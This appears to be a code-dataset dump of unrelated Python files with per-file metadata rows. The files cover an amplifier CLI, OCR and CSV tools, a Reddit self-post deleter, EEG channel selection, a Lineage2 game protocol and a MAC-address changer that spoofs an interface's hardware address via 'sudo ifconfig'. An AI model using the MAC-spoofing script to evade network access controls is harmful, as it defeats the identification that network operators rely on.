{}""".format('\n'.join(" {} {}".format(method.ljust(25), doc.splitlines()[0])
for method, doc in method_list))
try:
params = ctx.obj['parameters']
ctx.obj['p_ctrl'] = PrimareController(port=params['port'],
baudrate=params['baudrate'],
source=None,
volume=None,
debug=params['debug'])
if ctx.obj['parameters']['amp_info']:
ctx.obj['p_ctrl'].setup()
logger.info(help_string)
nb = ''
while True:
nb = raw_input('Cmd: ').strip()
if not nb or nb == 'q' or nb == 'quit':
logger.debug("Quit: '{}'".format(nb))
break
elif nb.startswith('help'):
if len(nb.split()) == 2:
help_method = nb.split()[1]
matches = [item for item in method_list
if item[0].startswith(help_method)]
if len(matches):
logger.info("\n".join("\n== {}\n{}".format(
method.ljust(25), doc_string) for
method, doc_string in matches))
else:
logger.info(
"Help requested on unknown method: {}".format(
help_method))
else:
logger.info(help_string)
else:
parsed_cmd = nb.split()
command = getattr(ctx.obj['p_ctrl'], parsed_cmd[0], None)
if command:
try:
if len(parsed_cmd) > 1:
if parsed_cmd[1].lower() == "true":
parsed_cmd[1] = True
elif parsed_cmd[1].lower() == "false":
parsed_cmd[1] = False
elif parsed_cmd[0] == "remote_cmd":
pass
parsed_cmd[1] = '{}'.format(parsed_cmd[1])
else:
parsed_cmd[1] = int(parsed_cmd[1])
command(parsed_cmd[1])
else:
command()
except TypeError as e:
logger.warn("You called a method with an incorrect" +
"number of parameters: {}".format(e))
else:
logger.info("No such function - try again")
except KeyboardInterrupt:
logger.info("User aborted")
# in a non-main thread:
ctx.obj['p_ctrl'].close()
del ctx.obj['p_ctrl']
ctx.obj['p_ctrl'] = None
if __name__ == '__main__':
cli()
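# --- Hedged illustration (not part of the original CLI) ---
# DefaultCmdGroup above builds click commands reflectively from
# PrimareController's public methods. The same pattern in miniature, with a
# stand-in class instead of the amplifier controller:
class _Box(object):
    def ping(self):
        """Print pong."""
        print('pong')
class _ReflectGroup(click.Group):
    def list_commands(self, ctx):
        return sorted(m for m in dir(_Box) if not m.startswith('_'))
    def get_command(self, ctx, name):
        method = getattr(_Box, name, None)
        if method is None:
            return None
        return click.Command(name, callback=lambda: method(_Box()),
                             help=method.__doc__)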
| 36.504348
| 79
| 0.47737
| 798
| 8,396
| 4.902256
| 0.288221
| 0.027607
| 0.021472
| 0.033742
| 0.221115
| 0.162065
| 0.126278
| 0.126278
| 0.126278
| 0.112986
| 0
| 0.01643
| 0.412816
| 8,396
| 229
| 80
| 36.663755
| 0.777079
| 0.137685
| 0
| 0.293413
| 0
| 0
| 0.129792
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02994
| false
| 0.02994
| 0.023952
| 0
| 0.071856
| 0.005988
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b51fa08d66290d275d2da9e4167fcbc0a1d4e931
| 382
|
py
|
Python
|
sjfxjc/foundations-for-analytics-with-python-master/csv/2csv_reader_parsing_and_write.py
|
SaronZhou/python
|
40d73b49b9b17542c73a3c09d28e479d2fefcde3
|
[
"MIT"
] | null | null | null |
sjfxjc/foundations-for-analytics-with-python-master/csv/2csv_reader_parsing_and_write.py
|
SaronZhou/python
|
40d73b49b9b17542c73a3c09d28e479d2fefcde3
|
[
"MIT"
] | null | null | null |
sjfxjc/foundations-for-analytics-with-python-master/csv/2csv_reader_parsing_and_write.py
|
SaronZhou/python
|
40d73b49b9b17542c73a3c09d28e479d2fefcde3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import csv
import sys
input_file = sys.argv[1]
output_file = sys.argv[2]
with open(input_file, 'r', newline='') as csv_in_file:
with open(output_file, 'w', newline='') as csv_out_file:
filereader = csv.reader(csv_in_file, delimiter=',')
filewriter = csv.writer(csv_out_file, delimiter=',')
for row_list in filereader:
filewriter.writerow(row_list)
| 29.384615
| 57
| 0.730366
| 61
| 382
| 4.344262
| 0.491803
| 0.067925
| 0.083019
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008982
| 0.125654
| 382
| 13
| 58
| 29.384615
| 0.784431
| 0.054974
| 0
| 0
| 0
| 0
| 0.01108
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5220f9d88a447b033fc07fa837a16f3731fa688
| 1,971
|
py
|
Python
|
ocrDA.py
|
it-pebune/ani-research-data-extraction
|
e8b0ffecb0835020ce7942223cf566dc45ccee35
|
[
"MIT"
] | null | null | null |
ocrDA.py
|
it-pebune/ani-research-data-extraction
|
e8b0ffecb0835020ce7942223cf566dc45ccee35
|
[
"MIT"
] | 7
|
2022-01-29T22:19:55.000Z
|
2022-03-28T18:18:19.000Z
|
ocrDA.py
|
it-pebune/ani-research-data-extraction
|
e8b0ffecb0835020ce7942223cf566dc45ccee35
|
[
"MIT"
] | null | null | null |
import json
from NewDeclarationInQueue.formular_converter import FormularConverter
from NewDeclarationInQueue.preprocess_one_step import PreprocessOneStep
from NewDeclarationInQueue.preprocess_two_steps import PreProcessTwoSteps
from NewDeclarationInQueue.processfiles.customprocess.search_text_line_parameter import SearchTextLineParameter
from NewDeclarationInQueue.processfiles.customprocess.table_config_detail import TableConfigDetail
from NewDeclarationInQueue.processfiles.customprocess.text_with_special_ch import TextWithSpecialCharacters
from NewDeclarationInQueue.processfiles.ocr_worker import OcrWorker
from NewDeclarationInQueue.processfiles.process_messages import ProcessMessages
def process_only_second_steps(input_file_path: str):
second_step = PreprocessOneStep()
#second_step.process_step_two(input_file_path)
second_step.process_custom_model_step_two(input_file_path)
def get_input(input_file: str):
node = []
with open(input_file) as json_data:
node = json.load(json_data)
json_data.close()
return node
def process_two_steps(sfile: str):
str_msg_id = 'abc'
dict_input = get_input(sfile)
two_steps = PreProcessTwoSteps()
process_messages = ProcessMessages('OCR Process', str_msg_id)
one_step = PreprocessOneStep()
ocr_constants = one_step.get_env()
ocr_file, process_messages = two_steps.get_file_info(dict_input, process_messages)
formular_converter = FormularConverter()
ocr_formular = formular_converter.get_formular_info(ocr_constants, ocr_file)
#process_messages_json = two_steps.process_document(ocr_file, ocr_constants, ocr_formular, process_messages)
process_messages = two_steps.process_document_with_custom_model(ocr_file, ocr_constants, process_messages)
#two_steps.save_in_output_queue(process_messages_json)
#process_only_second_steps(r"test_url.json")
process_two_steps(r"test_url.json")
| 38.647059
| 112
| 0.811771
| 235
| 1,971
| 6.395745
| 0.289362
| 0.08982
| 0.123087
| 0.0998
| 0.049235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129376
| 1,971
| 50
| 113
| 39.42
| 0.875874
| 0.125824
| 0
| 0
| 0
| 0
| 0.015734
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.3
| 0
| 0.433333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b525a442d992316233f044f50e799f9a075c90fa
| 1,270
|
py
|
Python
|
app/users/tasks.py
|
atulmishra-one/dairy_management_portal
|
a07320dc0f4419d4c78f7d2453c63b1c9544aba8
|
[
"MIT"
] | 2
|
2020-08-02T10:06:19.000Z
|
2022-03-29T06:10:57.000Z
|
app/users/tasks.py
|
atulmishra-one/dairy_management_portal
|
a07320dc0f4419d4c78f7d2453c63b1c9544aba8
|
[
"MIT"
] | null | null | null |
app/users/tasks.py
|
atulmishra-one/dairy_management_portal
|
a07320dc0f4419d4c78f7d2453c63b1c9544aba8
|
[
"MIT"
] | 2
|
2019-02-03T15:44:02.000Z
|
2021-03-09T07:30:28.000Z
|
import xlrd
from app.services.extension import task_server, sqlalchemy as db
from app.models.core.user import User
from app.application import initialize_app
try:
from app.config.production import ProductionConfig as config_object
except ImportError:
from app.config.local import LocalConfig as config_object
@task_server.task()
def upload_users(file_object):
workbook = xlrd.open_workbook(file_object)
worksheet = workbook.sheet_by_index(0)
offset = 0
rows = []
for i, row in enumerate(range(worksheet.nrows)):
if i <= offset: # (Optionally) skip headers
continue
r = []
for j, col in enumerate(range(worksheet.ncols)):
r.append(worksheet.cell_value(i, j))
rows.append(r)
users = []
for i, row in enumerate(rows):
users.append({
'initial_name': row[0],
'first_name': row[1],
'last_name': row[2],
'username': row[3],
'email': row[4],
'password': row[5],
'active': row[6]
})
app = initialize_app(config_object)
with app.test_request_context():
user_object = User()
user_object.create_or_update(users)
return "OK."
| 27.608696
| 71
| 0.607874
| 157
| 1,270
| 4.770701
| 0.509554
| 0.046729
| 0.034713
| 0.024032
| 0.048064
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009934
| 0.286614
| 1,270
| 46
| 72
| 27.608696
| 0.816777
| 0.019685
| 0
| 0
| 0
| 0
| 0.049035
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0.027027
| 0.189189
| 0
| 0.243243
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b526e227b8af6adb71768eb4900aaf57a69f1acb
| 3,444
|
py
|
Python
|
savenger.py
|
SlapBot/GodkillerArmor
|
27058332cd94c4389b092a621eeedc834d8f5a15
|
[
"MIT"
] | 3
|
2018-07-06T17:06:28.000Z
|
2018-09-06T03:31:43.000Z
|
savenger.py
|
SlapBot/GodkillerArmor
|
27058332cd94c4389b092a621eeedc834d8f5a15
|
[
"MIT"
] | null | null | null |
savenger.py
|
SlapBot/GodkillerArmor
|
27058332cd94c4389b092a621eeedc834d8f5a15
|
[
"MIT"
] | 1
|
2018-07-10T00:13:07.000Z
|
2018-07-10T00:13:07.000Z
|
from praw import Reddit
import random
class Savenger:
AVENGERS = ["Iron Man", "Doctor Strange", "Star-Lord", "Black Widow", "Thor",
"Spider-Man", "Captain America", "Wanda Maximoff", "Bucky Barnes",
"Loki", "Hulk", "Black Panther", "Vision", "Gamora", "Drax", "Nebula",
"Sam Wilson", "Mantis", "Okoye", "Shuri", "Groot", "Rocket", "Heimdall"]
def __init__(self):
self.Reddit = Reddit
def get_superhero(self):
return random.choice(self.AVENGERS)
def authenticate(self, username, password, client_id, client_secret, user_agent):
print("Authenticating...")
try:
self.reddit = self.Reddit(user_agent=user_agent, client_id=client_id,
client_secret=client_secret, username=username,
password=password)
self.user = self.reddit.user.me()
print(f"Authenticated as {self.user}")
return self.reddit
except Exception as e:
print(e)
exit()
def save(self, subreddit):
try:
print("Savengers are on the way, stay hold.")
subreddit = self.reddit.subreddit(subreddit)
print(f"{self.get_superhero()} finding every threatening submission made in {subreddit}")
subreddit_submissions = self.get_user_subreddit_submissions(subreddit)
self.delete_submissions(subreddit_submissions)
print(f"{self.get_superhero()} saved your from dying by the submission's author")
print(f"{self.get_superhero()} finding every forbidding comment made in {subreddit}")
subreddit_comments = self.get_user_subreddit_comments(subreddit)
self.delete_comments(subreddit_comments)
print("Savengers have saved you!")
print("Go visit https://www.reddit.com/r/savengers/ to have a chat with the fellow superheroes")
return True
except Exception as e:
print(e)
exit()
def get_user_subreddit_comments(self, subreddit):
subreddit_comments = []
for comment in self.user.comments.new(limit=None):
if comment.subreddit == subreddit:
if comment.body:
print(f"{self.get_superhero()} found a comment with the body: {comment.body}")
subreddit_comments.append(comment)
return subreddit_comments
def get_user_subreddit_submissions(self, subreddit):
subreddit_submissions = []
for submission in self.user.submissions.new(limit=None):
if submission.subreddit == subreddit:
if submission.title:
print(f"{self.get_superhero()} found a submission with the title: {submission.title}")
subreddit_submissions.append(submission)
return subreddit_submissions
def delete_comments(self, subreddit_comments):
for subreddit_comment in subreddit_comments:
print(f"{self.get_superhero()} successfully eliminated the threatening comment!")
subreddit_comment.delete()
return True
def delete_submissions(self, subreddit_submissions):
for subreddit_submission in subreddit_submissions:
print(f"{self.get_superhero()} successfully eliminated the forbidding post!")
subreddit_submission.delete()
return True
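# Illustrative usage sketch (not part of the original file); the credential
# strings below are placeholders for a real Reddit script-app's values.
if __name__ == "__main__":
    bot = Savenger()
    bot.authenticate(username="YOUR_USERNAME", password="YOUR_PASSWORD",
                     client_id="YOUR_CLIENT_ID", client_secret="YOUR_CLIENT_SECRET",
                     user_agent="savenger-demo by u/YOUR_USERNAME")
    bot.save("test")  # deletes this account's posts and comments in r/test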
| 44.727273
| 108
| 0.626597
| 370
| 3,444
| 5.683784
| 0.318919
| 0.029957
| 0.033286
| 0.043272
| 0.162625
| 0.162625
| 0.162625
| 0.07418
| 0
| 0
| 0
| 0
| 0.278165
| 3,444
| 76
| 109
| 45.315789
| 0.845937
| 0
| 0
| 0.166667
| 0
| 0.015152
| 0.256969
| 0.044715
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121212
| false
| 0.030303
| 0.030303
| 0.015152
| 0.287879
| 0.212121
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b52a4b91de40afb841386437bc92df7dcd61942d
| 1,493
|
py
|
Python
|
python-packages/pyRiemann-0.2.2/pyriemann/channelselection.py
|
rajegannathan/grasp-lift-eeg-cat-dog-solution-updated
|
ee45bee6f96cdb6d91184abc16f41bba1546c943
|
[
"BSD-3-Clause"
] | 2
|
2017-08-13T14:09:32.000Z
|
2018-07-16T23:39:00.000Z
|
python-packages/pyRiemann-0.2.2/pyriemann/channelselection.py
|
rajegannathan/grasp-lift-eeg-cat-dog-solution-updated
|
ee45bee6f96cdb6d91184abc16f41bba1546c943
|
[
"BSD-3-Clause"
] | null | null | null |
python-packages/pyRiemann-0.2.2/pyriemann/channelselection.py
|
rajegannathan/grasp-lift-eeg-cat-dog-solution-updated
|
ee45bee6f96cdb6d91184abc16f41bba1546c943
|
[
"BSD-3-Clause"
] | 2
|
2018-04-02T06:45:11.000Z
|
2018-07-16T23:39:02.000Z
|
from .utils.distance import distance
from .classification import MDM
import numpy
from sklearn.base import BaseEstimator, TransformerMixin
##########################################################
class ElectrodeSelection(BaseEstimator, TransformerMixin):
def __init__(self, nelec=16, metric='riemann'):
self.nelec = nelec
self.metric = metric
self.subelec = -1
self.dist = []
def fit(self, X, y=None):
mdm = MDM(metric=self.metric)
mdm.fit(X, y)
self.covmeans = mdm.covmeans
Ne, _ = self.covmeans[0].shape
self.subelec = list(range(Ne))  # a list, so electrodes can be popped below (range has no pop in Python 3)
while len(self.subelec) > self.nelec:
di = numpy.zeros((len(self.subelec), 1))
for idx in range(len(self.subelec)):
sub = self.subelec[:]
sub.pop(idx)
di[idx] = 0
for i in range(len(self.covmeans)):
for j in range(i + 1, len(self.covmeans)):
di[idx] += distance(
self.covmeans[i][
:, sub][
sub, :], self.covmeans[j][
:, sub][
sub, :])
# print(di)
torm = di.argmax()
self.dist.append(di.max())
self.subelec.pop(torm)
return self
def transform(self, X):
return X[:, self.subelec, :][:, :, self.subelec]
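# Illustrative usage sketch (an assumption; this module uses relative imports,
# so run it from a script that imports the installed package):
#
#   from pyriemann.channelselection import ElectrodeSelection
#   import numpy as np
#   rs = np.random.RandomState(0)
#   A = rs.randn(20, 8, 8)
#   X = np.array([a.dot(a.T) + 8 * np.eye(8) for a in A])  # SPD "covariance" trials
#   y = np.array([0, 1] * 10)
#   sel = ElectrodeSelection(nelec=4)
#   sel.fit(X, y)
#   print(sel.transform(X).shape)                          # -> (20, 4, 4)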
| 31.765957
| 62
| 0.464836
| 153
| 1,493
| 4.503268
| 0.326797
| 0.143687
| 0.060958
| 0.040639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009751
| 0.381782
| 1,493
| 46
| 63
| 32.456522
| 0.736728
| 0.005358
| 0
| 0.055556
| 0
| 0
| 0.004912
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.111111
| 0.027778
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b52daf8a9a6916b3bc3be9fb6b077491427da67f
| 1,728
|
py
|
Python
|
mac_changer.py
|
xicoder96/luv-sic
|
033527b558c3e4d7f254dca1e2f6f0ccf9ff78fe
|
[
"MIT"
] | null | null | null |
mac_changer.py
|
xicoder96/luv-sic
|
033527b558c3e4d7f254dca1e2f6f0ccf9ff78fe
|
[
"MIT"
] | null | null | null |
mac_changer.py
|
xicoder96/luv-sic
|
033527b558c3e4d7f254dca1e2f6f0ccf9ff78fe
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import subprocess
import re
import argparse
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--interface", dest="interface",
help="interface to change mac address")
parser.add_argument("-m", "--mac", dest="new_mac",
help="value of new mac address")
options = parser.parse_args()
if not options.interface:
parser.error("Please enter interface, use --help for more information")
elif not options.new_mac:
parser.error(
"Please enter new MAC address use --help for more information")
return options
def change_mac(interface, new_mac):
print(f"[+] Changing mac address for {interface} to {new_mac}")
subprocess.call(["sudo", "ifconfig", interface, "down"])
subprocess.call(["sudo", "ifconfig", interface, "hw", "ether", new_mac])
subprocess.call(["sudo", "ifconfig", interface, "up"])
def get_current_mac(interface):
ifconfig_result = str(subprocess.check_output(
["sudo", "ifconfig", interface]))
search_result = re.search(
r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w", ifconfig_result)
if search_result:
return search_result.group(0)
else:
print("[-] Could not read mac address")
if __name__ == "__main__":
options = get_arguments()
current_mac = get_current_mac(options.interface)
print(f"Current Mac:{current_mac}")
change_mac(options.interface, options.new_mac)
current_mac = get_current_mac(options.interface)
if current_mac == options.new_mac:
print(f"[+] MAC address was successfully changed to {current_mac}")
else:
print("[-] MAC address did not change")
| 33.230769
| 79
| 0.65162
| 221
| 1,728
| 4.918552
| 0.316742
| 0.020239
| 0.027599
| 0.033119
| 0.236431
| 0.158234
| 0.158234
| 0.01104
| 0.01104
| 0.01104
| 0
| 0.001468
| 0.211806
| 1,728
| 51
| 80
| 33.882353
| 0.796623
| 0.012153
| 0
| 0.1
| 0
| 0.025
| 0.292497
| 0.016999
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075
| false
| 0
| 0.075
| 0
| 0.2
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b53016b4f1a8a22aaafbf177615312636a59d031
| 1,916
|
py
|
Python
|
training/model.py
|
J77M/stuffy-nose-recognition
|
e5d8957e2026e9046e6ffee69a60a11a686bc042
|
[
"MIT"
] | null | null | null |
training/model.py
|
J77M/stuffy-nose-recognition
|
e5d8957e2026e9046e6ffee69a60a11a686bc042
|
[
"MIT"
] | null | null | null |
training/model.py
|
J77M/stuffy-nose-recognition
|
e5d8957e2026e9046e6ffee69a60a11a686bc042
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import numpy as np
import time
import utils
path = r'data/'
x, y = utils.reload_data(path)
inp_shape = (x[0].shape[0],1)
x = np.array(x).reshape(-1, 1000, 1)  # change 1000 to your sample length if you changed the frame (= CHUNK) or RESOLUTION
# prepared for testing and evaluating. try other combinations of architecture
dense_layers = [1]
conv_sizes = [64]
conv_layers = [2]
dense_layer_sizes = [256]
kernel = 10
pool_size = 4
_batchs = 5
_epochs = 10
for dense_layer in dense_layers:
for conv_layer in conv_layers:
for dense_size in dense_layer_sizes:
for conv_size in conv_sizes:
NAME = '{}-conv_layers-{}-dense_layers-{}-conv_size-{}-dense_size-{}-kernel-{}'.format(conv_layer,dense_layer,conv_size, dense_size,kernel, int(time.time()))
model = tf.keras.Sequential()
model.add(tf.keras.layers.Conv1D(conv_size, kernel, activation='relu', input_shape = inp_shape))
model.add(tf.keras.layers.MaxPooling1D(pool_size))
for i in range(conv_layer-1):
model.add(tf.keras.layers.Conv1D(conv_size, kernel, activation='relu'))
model.add(tf.keras.layers.MaxPooling1D(pool_size))
model.add(tf.keras.layers.Flatten())
for _ in range(dense_layer):
model.add(tf.keras.layers.Dense(dense_size, activation='relu'))
model.add(tf.keras.layers.Dense(1, activation='sigmoid'))
model.compile(loss = 'binary_crossentropy', optimizer='adam', metrics=['accuracy'])
tensorboard = tf.keras.callbacks.TensorBoard(log_dir='model_evaluate/{}'.format(NAME))
print(NAME)
model.fit(x,y, batch_size = _batchs, epochs=_epochs, validation_split = 0.2, callbacks=[tensorboard])
model.save('trained_models/{}.h5'.format(NAME))
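# Illustrative follow-up (an assumption, not part of the original script):
# compare the grid-search runs written above with
#   tensorboard --logdir model_evaluate
# and keep the NAME whose validation accuracy curve looks best.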
| 39.102041
| 173
| 0.641441
| 256
| 1,916
| 4.625
| 0.382813
| 0.053209
| 0.059122
| 0.088682
| 0.274493
| 0.217905
| 0.191723
| 0.162162
| 0.092905
| 0.092905
| 0
| 0.023826
| 0.233299
| 1,916
| 49
| 174
| 39.102041
| 0.782165
| 0.080898
| 0
| 0.055556
| 0
| 0
| 0.092098
| 0.039795
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0.027778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5325a85e324486debcb82eb330c6fd293cb8cf4
| 1,306
|
py
|
Python
|
game/game/protocol.py
|
maosplx/L2py
|
5d81b2ea150c0096cfce184706fa226950f7f583
|
[
"MIT"
] | 7
|
2020-09-01T21:52:37.000Z
|
2022-02-25T16:00:08.000Z
|
game/game/protocol.py
|
maosplx/L2py
|
5d81b2ea150c0096cfce184706fa226950f7f583
|
[
"MIT"
] | 4
|
2021-09-10T22:15:09.000Z
|
2022-03-25T22:17:43.000Z
|
game/game/protocol.py
|
maosplx/L2py
|
5d81b2ea150c0096cfce184706fa226950f7f583
|
[
"MIT"
] | 9
|
2020-09-01T21:53:39.000Z
|
2022-03-30T12:03:04.000Z
|
import logging
from common.api_handlers import handle_request
from common.packet import Packet
from common.response import Response
from common.transport.protocol import TCPProtocol
from game.models.world import WORLD
from game.session import GameSession
from game.states import Connected
LOG = logging.getLogger(f"l2py.{__name__}")
class Lineage2GameProtocol(TCPProtocol):
session_cls = GameSession
def connection_made(self, transport):
super().connection_made(transport)
LOG.info(
"New connection from %s:%s",
*self.transport.peer,
)
self.session.set_state(Connected)
@TCPProtocol.make_async
async def data_received(self, data: bytes):
request = self.transport.read(data)
response = await handle_request(request)
if response:
LOG.debug(
"Sending packet to %s:%s",
*self.transport.peer,
)
self.transport.write(response)
for action in response.actions_after:
action_result = await action
if isinstance(action_result, Packet):
self.transport.write(Response(action_result, self.session))
def connection_lost(self, exc) -> None:
self.session.logout_character()
| 30.372093
| 79
| 0.658499
| 146
| 1,306
| 5.760274
| 0.431507
| 0.092747
| 0.014269
| 0.035672
| 0.054697
| 0.054697
| 0
| 0
| 0
| 0
| 0
| 0.00207
| 0.260337
| 1,306
| 42
| 80
| 31.095238
| 0.86853
| 0
| 0
| 0.058824
| 0
| 0
| 0.048239
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.235294
| 0
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b536ac94f02abdab43e5ca604aa965f6ad2715d0
| 1,394
|
py
|
Python
|
pyoptmat/solvers.py
|
Argonne-National-Laboratory/pyoptmat
|
a6e5e8d0b93c77374d4ccbc65a86262eec5df77b
|
[
"MIT"
] | null | null | null |
pyoptmat/solvers.py
|
Argonne-National-Laboratory/pyoptmat
|
a6e5e8d0b93c77374d4ccbc65a86262eec5df77b
|
[
"MIT"
] | 1
|
2022-03-30T22:20:38.000Z
|
2022-03-31T15:02:22.000Z
|
pyoptmat/solvers.py
|
Argonne-National-Laboratory/pyoptmat
|
a6e5e8d0b93c77374d4ccbc65a86262eec5df77b
|
[
"MIT"
] | 2
|
2021-11-16T15:13:54.000Z
|
2022-01-06T21:35:42.000Z
|
import torch
import warnings
def newton_raphson(fn, x0, linsolver = "lu", rtol = 1e-6, atol = 1e-10,
miter = 100):
"""
Solve a nonlinear system with Newton's method. Return the
solution and the last Jacobian
Args:
fn: function that returns the residual and Jacobian
x0: starting point
linsolver (optional): method to use to solve the linear system
rtol (optional): nonlinear relative tolerance
atol (optional): nonlinear absolute tolerance
miter (optional): maximum number of nonlinear iterations
"""
x = x0
R, J = fn(x)
nR = torch.norm(R, dim = -1)
nR0 = nR
i = 0
while (i < miter) and torch.any(nR > atol) and torch.any(nR / nR0 > rtol):
x -= solve_linear_system(J, R, method = linsolver)
R, J = fn(x)
nR = torch.norm(R, dim = -1)
i += 1
if i == miter:
warnings.warn("Implicit solve did not succeed. Results may be inaccurate...")
return x, J
def solve_linear_system(A, b, method = "lu"):
"""
Solve or iterate on a linear system of equations
Args:
A: block matrix
b: block RHS
method (optional):
"""
if method == "diag":
return b / torch.diagonal(A, dim1=-2, dim2=-1)
elif method == "lu":
return torch.linalg.solve(A, b)
else:
raise ValueError("Unknown solver method!")
| 27.333333
| 82
| 0.585366
| 191
| 1,394
| 4.246073
| 0.471204
| 0.059186
| 0.009864
| 0.01233
| 0.051788
| 0.051788
| 0.051788
| 0.051788
| 0.051788
| 0.051788
| 0
| 0.021784
| 0.308465
| 1,394
| 50
| 83
| 27.88
| 0.819502
| 0.422525
| 0
| 0.166667
| 0
| 0
| 0.127572
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.083333
| 0
| 0.291667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5373a616def2b1d58dca3805f309b56a4c149e0
| 323
|
py
|
Python
|
Algo and DSA/LeetCode-Solutions-master/Python/number-of-substrings-with-only-1s.py
|
Sourav692/FAANG-Interview-Preparation
|
f523e5c94d582328b3edc449ea16ac6ab28cdc81
|
[
"Unlicense"
] | 3,269
|
2018-10-12T01:29:40.000Z
|
2022-03-31T17:58:41.000Z
|
Algo and DSA/LeetCode-Solutions-master/Python/number-of-substrings-with-only-1s.py
|
Sourav692/FAANG-Interview-Preparation
|
f523e5c94d582328b3edc449ea16ac6ab28cdc81
|
[
"Unlicense"
] | 53
|
2018-12-16T22:54:20.000Z
|
2022-02-25T08:31:20.000Z
|
Algo and DSA/LeetCode-Solutions-master/Python/number-of-substrings-with-only-1s.py
|
Sourav692/FAANG-Interview-Preparation
|
f523e5c94d582328b3edc449ea16ac6ab28cdc81
|
[
"Unlicense"
] | 1,236
|
2018-10-12T02:51:40.000Z
|
2022-03-30T13:30:37.000Z
|
# Time: O(n)
# Space: O(1)
class Solution(object):
def numSub(self, s):
"""
:type s: str
:rtype: int
"""
MOD = 10**9+7
result, count = 0, 0
for c in s:
count = count+1 if c == '1' else 0
result = (result+count)%MOD
return result
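# Illustrative check (not part of the original solution file): "0110111" has
# runs of ones of lengths 2 and 3, giving 3 + 6 = 9 all-ones substrings.
if __name__ == "__main__":
    print(Solution().numSub("0110111"))  # expected: 9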
| 20.1875
| 46
| 0.436533
| 44
| 323
| 3.204545
| 0.659091
| 0.156028
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 0.427245
| 323
| 15
| 47
| 21.533333
| 0.708108
| 0.151703
| 0
| 0
| 0
| 0
| 0.004149
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
